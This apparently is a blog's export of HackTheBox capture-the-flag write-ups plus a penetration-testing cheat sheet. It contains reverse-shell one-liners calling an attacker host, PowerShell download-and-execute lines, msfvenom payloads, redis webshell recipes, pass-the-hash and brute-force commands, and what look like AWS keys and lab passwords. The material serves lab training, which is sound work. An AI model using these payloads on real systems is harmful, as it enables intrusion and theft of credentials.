guesser we see that accounts.txt is being used to grab default creds.\nthe content seems to be all lowercase , oracle is case sensitive now so we will have to use an updated wordlist , lets use the one which metasploit uses\nwe will have to format this list a bit because when we compare it to the prev one we see that the user and pass are separated by a / which here is not the case.\nthis fixes it for us, now we can try guessing the password\nok nice we got our valid creds which is scott/tiger\nnow lets use these creds\nsqlplus64 scott/tiger@10.10.10.82:1521/XE\nlets check our users privilege\nok so we seem to have only connect and resource privs\nusing odat we can escalate our priv with the --sysdba flag and then make use of the --putFile flag to upload a revshell.aspx, as iis usually supports aspx\nthen we will visit the directory with our rev shell and get our shell\n└─$ python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U \u0026quot;scott\u0026quot; -P \u0026quot;tiger\u0026quot; -d XE --putFile C:\\inetpub\\wwwroot muq.aspx muq.aspx --sysdba\nnow lets visit the page\nlets get our rev shell from here\nlets get our nishang shell from here\nhttps://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1\nadd this line to call it at the bottom of the file\ntail -1 Invoke-PowerShellTcp.ps1\nnow lets use the webshell to provoke it\ntyping this in the webshell, gives us our shell\npowershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/nish.ps1')\nand boom we have our user flag\nnow lets try for the root flag\nthere was one more file which was some issue.txt , lets check that out\nok so this password did not work at all , there is a ? 
at the start of the password maybe we are not viewing it properly.\nlets try the same command on our webshell\nyep the character is different , lets try this now\nalright so we got a memory dump\nlets get our os version first for our profile\nsysteminfo | findstr /B /C:\u0026quot;OS Name\u0026quot; /C:\u0026quot;OS Version\u0026quot;\nhttps://github.com/volatilityfoundation/volatility3.git\nthen we clone volatility from there\npython3 vol.py -f ~/Downloads/SILO-20180105-221806.dmp windows.info\nwe are not getting proper info from this version of volatility or maybe i am using it wrong\nlets try with volatility 2\ngit clone https://github.com/volatilityfoundation/volatility.git\ncd volatility\npython2 setup.py install\nnow lets run volatility 2 with\npython2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp imageinfo\ni kept getting a bunch of import errors , i solved that by running these\nsudo apt-get install python2.7-dev\npip2 install pycryptodome\npip2 install distorm3\nrunning\npython2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp imageinfo\ngives us\nSuggested Profile(s) : Win2016x64_14393, Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_10240_17770, Win10x64_18362, Win10x64_14393, Win10x64, Win2012R2x64_18340, Win10x64_16299, Win2012R2x64, Win10x64_19041, Win2012x64, Win10x64_17763, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063) AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS) AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS) AS Layer3 : FileAddressSpace (/home/kali/Downloads/SILO-20180105-221806.dmp) PAE type : No PAE DTB : 0x1a7000L KDBG : 0xf80078520a30L Number of Processors : 2 Image Type (Service Pack) : 0 KPCR for CPU 0 : 0xfffff8007857b000L KPCR for CPU 1 : 0xffffd000207e8000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2018-01-05 22:18:07 UTC+0000 Image local date and time : 2018-01-05 22:18:07 +0000\nwe will use the WIN2012 profile\nlets run this now and check our ps tree\npython2 vol.py 
-f ~/Downloads/SILO-20180105-221806.dmp --profile Win2012R2x64 pstree\nhashdump returns us this\npth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd\nthis gives us our shell, with which we can easily get the root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/silo/","section":"CTF Writeups","summary":"","title":"Silo","type":"ctf-writeups"},{"content":" Solidstate # Overview # OS: Linux IP: 10.10.10.51 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # accessed james server , got ssh login details , logged in as mindy on ssh, escaped rbash shell by using a james server exploit which gave us a bash shell , enumerated using linpeas , further enumerated with linEnum , checked processes with pspy found a cron job running a root file and used that to get a rev shell.\nEnumeration # nmap scan results\ndirbuster result\nhttp://10.10.10.51:80 # Directories found during testing:\nDirs found with a 200 response:\n/ /images/ /assets/ /assets/css/ /assets/fonts/ /assets/js/ /assets/sass/ /assets/css/images/ /assets/sass/base/ /assets/js/ie/ /assets/sass/components/ /assets/sass/layout/ /assets/sass/libs/\nDirs found with a 403 response:\n/icons/ /icons/small/ /server-status/\nFiles found during testing:\nFiles found with a 200 responce:\n/index.html /services.html /about.html /assets/js/skel.min.js /assets/js/jquery.min.js /assets/js/jquery.scrollex.min.js /assets/js/util.js /assets/fonts/FontAwesome.otf /assets/css/font-awesome.min.css /assets/js/main.js /assets/css/images/close.svg /assets/css/ie8.css /assets/fonts/fontawesome-webfont.eot /assets/css/ie9.css /assets/sass/base/_page.scss /assets/js/ie/PIE.htc /assets/sass/ie8.scss /assets/sass/base/_typography.scss /assets/js/ie/backgroundsize.min.htc /assets/css/main.css /assets/sass/ie9.scss /assets/sass/components/_box.scss /assets/js/ie/html5shiv.js /assets/fonts/fontawesome-webfont.svg 
/assets/fonts/fontawesome-webfont.ttf /assets/sass/components/_button.scss /assets/js/ie/respond.min.js /assets/sass/components/_features.scss /assets/fonts/fontawesome-webfont.woff /assets/sass/components/_form.scss /assets/sass/main.scss /assets/sass/components/_icon.scss /assets/fonts/fontawesome-webfont.woff2 /assets/sass/components/_image.scss /assets/sass/components/_list.scss /assets/sass/components/_section.scss /assets/sass/components/_table.scss /assets/sass/libs/_functions.scss /assets/sass/layout/_banner.scss /assets/sass/libs/_mixins.scss /assets/sass/layout/_footer.scss /assets/sass/libs/_skel.scss /assets/sass/libs/_vars.scss /assets/sass/layout/_header.scss /assets/sass/layout/_menu.scss /assets/sass/layout/_wrapper.scss\nnothing interesting here\nVulnerabilities # Exploitation # James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.\nTCP port 4555 is interesting because it is the James administration port. Even without an exploit, if I can access this service, I can likely get into things that might be useful. 
- 0xdf\nso let's visit port 4555 first\nwe are able to access it using the default root:root creds\nso we have these users, let's change the pass for them and then access and check out their mails\njames content\nthomas has nothing\njohn content\nok so mindy seems to have some temporary pass and her access is restricted.\nlet's check mindy's mail\nok so mindy has 2 mails\nlet's check them out\nok so we have our ssh creds now which are mindy:P@55W0rd1!2@\nmailadmin does not have any which is ironic\nright off we have our user flag\nok so apparently our bash is restricted to an rbash, so we have very limited commands\nlet's try getting out of here first\nrunning cat /etc/passwd also shows us what shell mindy has access to\nwe can use the -t switch and specify bash and it would log us in with the bash shell instead of the intended rbash.\nsshpass -p \u0026#39;P@55W0rd1!2@\u0026#39; ssh mindy@10.10.10.51 -t bash\nbut I don't think this is the intended way of getting a bash shell in this box.\nlet's try using an exploit instead\nwe will use the 4th option\nlet's use this payload\nbash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.35/8080 0\u0026gt;\u0026amp;1\nand we have our shell\nlet's try accessing admin with this now\nwe will still have to do some privesc, let's get linpeas on this and start enumerating for some vectors\nwe set up the server in the dir containing linpeas.sh with\npython3 -m http.server\nand then we use this command on the victim's machine to grab it\nwget http://10.10.14.35:8000/linpeas.sh\nnow let's run it (run it immediately, I noticed that files put in the tmp dir. 
are being removed periodically)\nok so there seems to be a cron job running under root, I'm not getting info on what is actually being run\nlet's run a more thorough scan with LinEnum\nhttps://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh\nthis file is pretty interesting, it has root permissions but is writable by the user\nlet's check out the processes as well with pspy\nhttps://github.com/DominicBreuker/pspy\nThe Linux version 4.9.0-3-686-pae indicates that this is a 32-bit kernel. The \u0026ldquo;686\u0026rdquo; refers to the 32-bit architecture, and \u0026ldquo;PAE\u0026rdquo; (Physical Address Extension) allows the system to address more than 4 GB of RAM on a 32-bit system. So, this is a 32-bit version of Debian.\nso let's use the 32-bit version of pspy\nok so this process seems to be running every 3 mins and we know it's being run with root privs.\nlet's check this file out\nok so this was the file responsible for cleaning up tmp every 3 mins, let's change it so that we get a rev shell instead.\nlet's upgrade our shell a bit first\nnow let's edit the tmp.py file\nand in 3 minutes we should have our shell\ngrabbing root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/solidstate/","section":"CTF Writeups","summary":"","title":"Solidstate","type":"ctf-writeups"},{"content":" Granny # Overview # OS: Windows IP: 10.10.10.15 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Did it w/o metasploit, learnt how to use davtest, how to upload files to a server using curl, looked at system info, found a suitable local exploit, also learnt how to send files from the host to write on the target's disk, and then used churrasco to escalate privilege and open another remote shell.\nEnumeration # nmap scan result\nchecking for supported http methods\nwhat is webdav?\nWeb Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. 
It was originally started in 1996\nnow, on checking the response header we notice that it is being powered by asp.net\nwhich tells us that we will be able to execute aspx files on the server\ndirbusting results\nnothing useful found\nperforming a davtest to check what files can be uploaded\nVulnerabilities # Reverse shell through http methods workaround\nExploitation # ok so we can use the MOVE method, we know that MOVE allows us to rename the file as well, so let's try to PUT a file then MOVE it, renaming it to the .asp extension, and see if that allows us to upload asp files.\ncURL, which stands for client URL, is a command line tool that developers use to transfer data to and from a server. At the most fundamental, cURL lets you talk to a server by specifying the location (in the form of a URL) and the data you want to send.\nBy default, curl uses the GET method, but you can use -X to change it to other methods like POST, PUT, DELETE, etc.\nperfect, now let's try renaming it\nmsfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.7 LPORT=1234 -o shell.aspx\nwe use this for making a reverse shell payload which we will upload to the server as a text file, then we will rename that text file to .asp\nrenaming to aspx\non curling\nwe are greeted with this error, let's figure out why\non checking the contents of the txt file we notice that it's all cluttered and none of the formatting is being saved, let's preserve all that with a simple binary command\nnow let's visit the site\ngreat so all the formatting is preserved now\nand we are in\nunfortunately our privilege is still low, let's try escalating it\nlet's look at our system's info\nlet's look for an exploit\nnow let's look for a writable directory on the victim's machine\nlet's try getting our churrasco.exe file here\nlet's get our netcat listener here as well\nsetting up another listener\nnow let's run the nc listener using churrasco\nand boom we have access, now let's grab our files\nuser flag\nroot flag\n","date":"22 July 
2024","externalUrl":null,"permalink":"/ctf-writeups/granny/","section":"CTF Writeups","summary":"","title":"Granny","type":"ctf-writeups"},{"content":" Jerry # Overview # OS: Windows IP: 10.10.10.95 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # not able to load up the homepage or connect to the machine for some reason, leaving this for later.\nEnumeration # nmap scan results\nHomepage\nVulnerabilities # Exploitation # ","date":"22 July 2024","externalUrl":null,"permalink":"/ctf-writeups/jerry/","section":"CTF Writeups","summary":"","title":"Jerry","type":"ctf-writeups"},{"content":" Nineveh # Overview # OS: Linux IP: 10.10.10.43 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # intended user path via port knocking left, http://linenum.sh , chkrootkit vuln, cron job, process script, burp, binwalk.\nLoot # notes parameter | Error Message\nninevehNotes.txt | No error, displays note\n/etc/passwd | No Note is selected.\n../../../../../../../../../../etc/passwd | No Note is selected.\nninevehNotes | Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31\nninevehNote | No Note is selected.\nfiles/ninevehNotes/../../../../../../../../../etc/passwd | File name too long.\nfiles/ninevehNotes/../../../../../../../etc/passwd | The contents of /etc/passwd\n/ninevehNotes/../etc/passwd | The contents of /etc/passwd\nEnumeration # nmap scan results\nsupported http methods\ndirbusting results for http\ndirbusting results for https\nwe have to specify the -k flag\nlet's visit this page\nVulnerabilities # phpLiteAdmin v1.9 vuln\nExploitation # let's try bruteforcing the phpLiteAdmin login page with hydra and see if it works out\nalright so we got password 123 as the pass, now let's try accessing and see what's up\nwe are greeted with this page where we can infer that there is a database named test with no tables\nwe will be using this php injection exploit\nnow let's try to get into this page from earlier\nusing burp it shows the post form as this\nnow assuming that the password check is hardcoded to be just a simple strcmp between two fields.\nwe know that if we do strcmp between two equal strings it returns 0 which means they're equal. Suppose we give an invalid type as one of the fields, then in this case it'll return null which is comparable to 0. 
let's try this approach by modifying the post data\nand boom we're in\non visiting the notes page we are greeted with this, if we look carefully we can see that the file is being mentioned in the url, let's check for lfi.\nwith this we can infer that as long as ninevehNotes is there in the parameter we can access anything, let's try to access the shell we created before\nand we are greeted with this\nnow let's check for cmd exec with ls\ncool so we can execute commands, let's try getting a reverse shell with burpsuite now\nwith this url encoded reverse shell code\nnice, we have access as www-data, now let's escalate our privileges\nPrivilege escalation upgrading our shell\nlet's get our linenum.sh on an http server and make it available for this machine\nok so we can access amrois' folder but we can't view the flag, let's look around more\nhm amrois has access to only this folder\nok so we notice that the reports are being made every minute, there may be a cron job behind this\nlet's try creating our own script\n#!/bin/bash\n# loop by line\nIFS=$\u0026#39;\\n\u0026#39;\nold_process=$(ps -eo command)\nwhile true; do\n    new_process=$(ps -eo command)\n    diff \u0026lt;(echo \u0026#34;$old_process\u0026#34;) \u0026lt;(echo \u0026#34;$new_process\u0026#34;) | grep \u0026#39;[\u0026lt;\u0026gt;]\u0026#39;\n    sleep 1\n    old_process=$new_process\ndone\nnow we do chmod +x procmon.sh followed by ./procmon.sh to run the script\nok so we can see that these are the cron jobs that are running every minute\nit seems to be executing the path /usr/bin/chkrootkit\nchkrootkit vulnerabilities\nlet's use this\nand there we go, we got our shell with root privilege\nlet's grab our flags\nroot flag\nuser flag\nIntended route for user ok so remember the secure notes page which showed an image file? 
let's check that out\non downloading the image and performing a binwalk we get these files that were hidden along with it\nlet's check these files out now\nnow let's check those files we got for anything interesting\nand there we go, we got a key and something else\n","date":"22 July 2024","externalUrl":null,"permalink":"/ctf-writeups/nineveh/","section":"CTF Writeups","summary":"","title":"Nineveh","type":"ctf-writeups"},{"content":" Grandpa # Overview # OS: Windows IP: 10.10.10.14 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to use the local exploit suggester.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nhomepage\nVulnerabilities # Port 80/tcp\nhttps://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl/\nExploitation # with metasploit, using the vulnerability we found earlier, we have gotten access pretty easily, now let's look around\nAlright, so we are not able to access either harry or administrator, possibly because our user's privilege is low.\non trying to get the system information we encounter this\nlet's list out the processes\ntime to migrate into one of the nt authority services\nnow let's run a local exploit suggester and look for exploits for this system.\nlet's go with the client_copy_image\nand there we go, we have escalated our privilege\nroot flag\nuser flag\npwned\n","date":"19 July 2024","externalUrl":null,"permalink":"/ctf-writeups/grandpa/","section":"CTF Writeups","summary":"","title":"Grandpa","type":"ctf-writeups"},{"content":" Beep # Overview # OS: Linux IP: 10.10.10.7 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Learnt how to use a local file inclusion exploit for directory traversal.\nEnumeration # nmap scan results\nNot able to access the page?\nlet's change our min tls setting in about:config\nnow we can view the homepage\nVulnerabilities # Elastix local file inclusion 
vulnerability\nhttps://www.exploit-db.com/exploits/37637\nWhat is LFI ? # An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.\nLocal File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI).\nDirectory Traversal # Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows.\nhttp://example.com/?file=../../../../etc/passwd In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. 
This information may then be used to advance an attack.\nExploitation # Let's use the LFI vulnerability we found earlier to perform our directory traversal\ndamn it works, now let's check if we can find anything useful from this page\nlet's try using these credentials to access the machine via ssh\nand there we go, we got access, now let's look for the flags\nroot flag\nuser flag\npwned\n","date":"18 July 2024","externalUrl":null,"permalink":"/ctf-writeups/beep/","section":"CTF Writeups","summary":"","title":"Beep","type":"ctf-writeups"},{"content":" Bashed # Overview # OS: Linux IP: 10.10.10.68 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Learnt how to open a reverse shell with python and privilege escalation.\nEnumeration # nmap scan results\nHomepage\ndir-busting results\npossible exploit\nVulnerabilities # Possible reverse shell execution at\n10.10.10.68/dev/phpbash.php shell\nExploitation # By accessing the directory we found earlier and executing some shell commands we have gotten ourselves the user flag\nthis tells us that the user scriptmanager can execute any command\nso let's try to spawn a shell as scriptmanager\ndoes not seem to work, probably because the shell we are using does not allow it?\nlet's try to open a reverse shell\nwe start off by setting up a listener on our kali machine using netcat\nnow let's identify if the target has python using the python --version command\ngreat so the target has python!\nnow let's run our reverse shell command\nand there we go, we have our reverse shell set up, now let's try the earlier command to switch the user to scriptmanager\nstill can't access root\non looking further we notice that scriptmanager has access to this scripts directory, let's check it out\ndamn, so there is a py file that is being executed which creates a text file with the following text\nfurthermore, we notice that the text file that is being created is owned by root? 
let's try making it so that our reverse shell code is executed.\nhere we write our reverse shell code into exploit.py, then we get rid of the test.py that was already there and rename our code to test.py; this should execute the exploit and give us a reverse shell connection with root privilege on port 1235.\nand there we go, we have root access, time to grab the flag from the root folder\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bashed/","section":"CTF Writeups","summary":"","title":"Bashed","type":"ctf-writeups"},{"content":" Blue # Overview # OS: Windows IP: 10.10.10.40 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # smb 2.1.0 vulnerability / Eternal Blue.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nVulnerabilities # port 445 / tcp\nsmb 2.1.0 windows 7\nhttps://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/\nExploitation # using the smb 2.1.0 vulnerability eternal blue that we found earlier\nwe got in, now time to grab our flags\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/blue/","section":"CTF Writeups","summary":"","title":"Blue","type":"ctf-writeups"},{"content":" Lame # Overview # OS: Linux IP: 10.10.10.3 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # vsftpd-234 backdoor exploit.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nVulnerabilities # PORT 21/tcp\nvsftpd 2.3.4 backdoor\nhttps://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/\nPORT 445/tcp\nsamba smbd 3.0.20-Debian\nCVE-2007-2447 25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the \u0026ldquo;username map script\u0026rdquo; smb.\nExploitation # Using metasploit to execute the backdoor attack\nSo 
apparently, the backdoor exploit does not work, so we will now try another vulnerability that we had found\nthe samba exploit works, now time to grab our flags\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/lame/","section":"CTF Writeups","summary":"","title":"Lame","type":"ctf-writeups"},{"content":" Legacyq # Overview # OS: Windows IP: 10.10.10.4 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # smb vulnerability.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nChecking for existing smb vulnerabilities\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nPORT 445/tcp\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\ngained access to the shell, now let's look for the flags\nroot flag\nuser flag\nPwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/legacyq/","section":"CTF Writeups","summary":"","title":"Legacyq","type":"ctf-writeups"},{"content":" Shocker # Overview # OS: Linux IP: 10.10.10.56 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # cgi-bin/user.sh shellshock exploit + perl.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nDirectory busting results\n/\n/cgi-bin/ → user.sh\n/icons/\n/icons/small/\nCould possibly run a script here?\nVulnerabilities # PORT 40/TCP\nlogrotate\nhttps://www.exploit-db.com/exploits/46676\nPORT 2222/TCP\nusername enumeration\nhttps://www.exploit-db.com/exploits/40136\nDIRECTORY\n/cgi-bin/user.sh\nShellshock\nExploitation # Exploiting using the shellshock vulnerability\nNow let's grab our flags, starting with the user flag\nnot able to access root directory, probably because we have a lower privilege\nPrivilege escalation\nand here we have the root flag as 
well\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/shocker/","section":"CTF Writeups","summary":"","title":"Shocker","type":"ctf-writeups"},{"content":" 1. Enumeration # Metadata # exiftool # exiftool file Local Enumeration Scripts # Grabbing usernames # grep sh$ /etc/passwd Finding SUID binaries # find / -perm -4000 -type f 2\u0026gt;/dev/null find / -user root -type f -perm -4000 -ls 2\u0026gt;/dev/null Cloud / AWS # AWS → secret → s3 # aws configure\n┌──(kali㉿kali)-[~/Desktop/vpn]\n└─$ aws configure\nAWS Access Key ID [****************c7em]: AKIAA042540D4E8C3E8E\nAWS Secret Access Key [****************3E8E]: Zf5bIMiltmLF2ux1JZyX3Gs3MasRtlwcAolHc7em\nDefault region name [us-east-1]:\nDefault output format [json]:\n┌──(kali㉿kali)-[~/Desktop/vpn]\n└─$ aws --endpoint-url http://facts.htb:54321 s3 ls\n2025-09-11 08:06:52 internal\n2025-09-11 08:06:52 randomfacts\n┌──(kali㉿kali)-[~/Desktop/vpn]\n└─$ Redis # https://hackviser.com/tactics/pentesting/services/redis\nmetasploit # use auxiliary/scanner/redis/redis_server Connecting # redis-cli -h target.com Spawning webshell # Method 1: PHP webshell redis-cli -h target.com \u0026gt; flushall \u0026gt; set shell \u0026#39;\u0026lt;?php system($_REQUEST[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.php \u0026gt; config set dir /var/www/html \u0026gt; save # Access: http://target.com/shell.php?cmd=whoami # Method 2: ASP.NET webshell \u0026gt; set shell \u0026#39;\u0026lt;%@ Page Language=\u0026#34;C#\u0026#34; %\u0026gt;\u0026lt;%@ Import Namespace=\u0026#34;System.Diagnostics\u0026#34; %\u0026gt;\u0026lt;%Process.Start(Request[\u0026#34;cmd\u0026#34;]);%\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.aspx \u0026gt; config set dir C:\\\\inetpub\\\\wwwroot \u0026gt; save # Method 3: JSP webshell \u0026gt; set shell 
\u0026#39;\u0026lt;%Runtime.getRuntime().exec(request.getParameter(\u0026#34;cmd\u0026#34;));%\u0026gt;\u0026#39; \u0026gt; config set dbfilename shell.jsp \u0026gt; config set dir /var/www/html \u0026gt; save Redis RCE # RCE: https://github.com/Ridter/redis-rce https://github.com/gysf666/RedisModules-ExecuteCommand python redis-rce.py -r 192.168.220.176 -L 192.168.45.198 -P 6666 -p 6379 -f exp.so SSH # usually located in the home directory of the user\nhttp://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa Using a key # nano id_rsa (paste the key) chmod 600 id_rsa ssh -i id_rsa username@target_ip ssh -i root root@127.0.0.1 -o IdentitiesOnly=yes Cracking a key #\n└─$ ssh2john id_ed25519\nid_ed25519:$sshng$6$16$e641fd491743bdd48d8633fcb477d0cc$290$6f70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010e641fd491743bdd48d8633fcb477d0cc0000001800000001000000330000000b7373682d65643235353139000000208016016aec442bd77315593f7e6b505d37fc52deed8f639302ab1985ad979866000000a0c64764ca8c76078c20a7c69b61eb4867f6d9e504f8aed73d6c6f476b7be93963a69947e0ad5e9eb1b7c0b13b1381635437e295c403584e107441db92d98bae664ac3e2eb57a8166147866593d2439f1c7a4f95b63bfca9f6f028f35e7dad040ba9eec3e8831dd9024f30b59db48861f8f1b3e08345d20489ae095b73baef4c1eba4203dd2b1c92c14c034e0478268654d884349fc0fa875de00f5ea7840a5953$24$130\n┌──(kali㉿kali)-[~/Desktop/Boxes/Facts]\n└─$ ssh2john id_ed25519 \u0026gt; hash.txt\n┌──(kali㉿kali)-[~/Desktop/Boxes/Facts]\n└─$ cat hash.txt\nOld SSH Algorithms # ssh -oKexAlgorithms=+diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 -oHostKeyAlgorithms=+ssh-rsa root@beep.htb Nmap # Going through nmap scripts # ls -al /usr/share/nmap/scripts/ | grep ftp- Top UDP # nmap 10.129.18.188 -sU --top-ports=100 --min-rate=20000 Useful Switches # sn → Ping 
sweep sS → TCP SYN Pn → Disable host discovery p- → All ports sV → Version detection A → OS detect + scripts + traceroute O → OS detection T4 → Faster scan sC → Default scripts Port Knocking # for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 \u0026gt;/dev/null; done ssh -i ~/keys/id_rsa_nineveh_amrois amrois@10.10.10.43 Filtered Ports # nmap -p- --min-rate 10000 \u0026lt;ip\u0026gt; Web Enumeration # Gobuster # gobuster dir -u http://10.129.229.27/ -w /home/kali/Desktop/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -k if https also try --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt API enumeration make a file like this {GOBUSTER}/v1 {GOBUSTER}/v2 name it pattern and then kali@kali:~$ gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern and then you can follow with gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt Dirb # dirb http://192.168.1.224/ /usr/share/wordlists/dirb/common.txt Feroxbuster # feroxbuster -u http://10.10.11.220 -x php feroxbuster -u http://10.10.11.220/js -x js feroxbuster -u http://\u0026lt;IP\u0026gt; -w /usr/share/wordlists/dirb/common.txt -x php,txt,html **I’ll use feroxbuster to brute force the API. I’ll use the -m GET,POST option to try both GET and POST requests, and -k to accept the invalid TLS certificate. 
I’m starting at /nagiosxi/api, and it finds v1 quickly (as well as includes):** Sublist3r # sublist3r -d website -e google,yahoo Wfuzz # wfuzz -u http://10.129.18.188 -H \u0026#34;Host: FUZZ.pandora.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 1131 wfuzz -u http://\u0026lt;IP\u0026gt; -H \u0026#34;Host: FUZZ.domain.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt Parameter fuzzing wfuzz -u \u0026#34;https://streamio.htb/admin/?FUZZ=\u0026#34; -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H \u0026#34;Cookie: PHPSESSID=jtde06u71uq4t7pvs59b8iis1o\u0026#34; --hh 1678 Php filter # https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php echo \u0026#34;PGgxPDQo/Pg==\u0026#34; | base64 -d \u0026gt; master.php Ffuf # Username Enumeration # ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d \u0026#34;username=FUZZ\u0026amp;email=x\u0026amp;password=x\u0026amp;cpassword=x\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://MACHINE_IP/customers/signup -mr \u0026#34;username already exists\u0026#34; Subdomain Enum # ffuf -u http://builder.htb/ -H \u0026#34;Host: FUZZ.trackbox.scipiosoft.com\u0026#34; -w /home/kali/Desktop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac ffuf -u \u0026#34;http://builder.htb:8080\u0026#34; -H \u0026#34;Host: FUZZ.builder.htb:8080\u0026#34; -w /home/kali/Desktop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac Bruteforcing # ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d \u0026#34;username=W1\u0026amp;password=W2\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://MACHINE_IP/customers/login -fc 200 ffuf -w 
/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.95.192/ -fc 200 ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d \u0026#34;username=W1\u0026amp;password=W2\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.1.27/login.php -fc 200 Dirbusting # ffuf -u http://editorial.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.txt,.bak,.old,.zip -fc 404 -k Service Enumeration # SMB # smbclient -L \\\\\\\\192.91.46.3 -U admin to access a share remove -L smbclient \\\\\\\\192.91.46.3\\\\public -U admin just use this **smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina%NewIntelligenceCorpUser9876 impacket-smbclient Tiffany.Molina:NewIntelligenceCorpUser9876@10.129.95.154** crackmapexec smb support.htb --shares -M spider_plus -o DOWNLOAD_FLAG=True netexec smb $target -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --shares --spider HR --regex grep -ri 